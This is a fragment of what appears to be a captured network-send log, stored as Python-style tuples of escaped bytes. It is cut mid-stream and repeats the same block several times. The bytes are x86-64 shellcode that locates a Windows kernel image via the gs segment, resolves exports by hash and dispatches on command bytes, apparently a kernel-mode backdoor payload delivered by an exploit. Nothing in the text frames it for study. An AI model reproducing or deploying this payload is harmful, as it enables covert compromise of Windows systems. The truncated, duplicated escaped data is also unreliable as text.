eH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 10, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 11, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 12, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\